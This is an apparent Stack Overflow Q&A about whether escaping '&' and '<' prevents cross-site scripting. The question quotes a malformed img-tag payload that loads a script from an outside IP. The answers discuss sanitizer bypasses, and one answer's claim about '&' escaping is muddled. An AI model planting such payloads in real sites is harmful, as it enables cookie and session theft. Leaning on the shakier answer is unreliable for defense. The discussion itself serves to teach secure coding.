# how can XSS work as long as i ensure i replace all & to &amp; and then replace all < to &lt;?

Tags: javascript, html, security, xss

From http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html:

> How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page. `<img src=""http://www.a.com/a.jpg<script type=text/javascript  src="http://1.2.3.4:81/xss.js">" /><<img  src=""http://www.a.com/a.jpg</script>"`

Ok above that snippet, he was talking about replacing all `<` to `&lt;`

So basically if the user wrote something like

```
<img src=""http://www.a.com/a.jpg<script type=text/javascript 
    src="http://1.2.3.4:81/xss.js">" /><<img 
    src=""http://www.a.com/a.jpg</script>
```

I do not understand why is it capable of XSS if we simply do a search for the character `&` and replace it with `&amp;`, then do a search for `<` and replace it with `&lt;`

Answer (score 1, accepted):

The problem Jeff Atwood was talking about was where some HTML tags were allowed.  In his case, he was allowing `<img>` tags.  In the sneaky XSS attack, the cracker **used** an image tag, but also dumped some javascript into it.

Because Jeff's sanitizer was allowing `<img>` (and it's attributes), it skipped cleaning the `<script>` tag (probably because it ignored everything inside the `<img>` tag).

If you replace **every, single** instance of `<` with `&lt;` and so on, it should be clean.  To rephrase a line of Mr. Atwood's article, however, "you can't just clobber every single questionable thing."

Comment: Well it depends on the scenario. Saying cleaning ", > and < is enough is not always correct. For example, if you allow user input within an attribute value which is not surrounded by quotes, then you are in trouble. While we should always use quotes around attributes, designers may not understand these things. Some other problems involve placing user input in, say, anchor tag's href-attribute. If you replace everything with HTML entities, then it's both a ton safer and uglier.

Answer (score 1):

Replacing `<` with `&lt;` will make the tag a standard string, as it's not a tag any more seeing as it starts with `&lt;` not a `<`.

For example, `<div>` is a tag, whereas `&lt;div>` is not; it's just a string. This means any `<script>` tags are parsed as strings, preventing XSS. Replacing `&` with `&amp;` will stop arguments being parsed properly in XSS URLs (for example, `www.url.com/index.php?foo=bar&bar=zip` will turn into `www.url.com/index.php?foo=bar&amp;bar=zip`), which isn't a valid URI.

Of course, these santisation efforts are not the be all and end all; there are going to be ways around this, as with any security implementation.

Answer (score 0):

I believe(correct me if wrong please, because security is **HARD** ;)) that works. The problem most of the times is that developers are using [blacklists instead of whitelists](http://www.testingsecurity.com/whitelists_vs_blacklists). When you escape every tag like you do, then you can't output any HTML. But then again I think you could use something like markdown to generate HTML.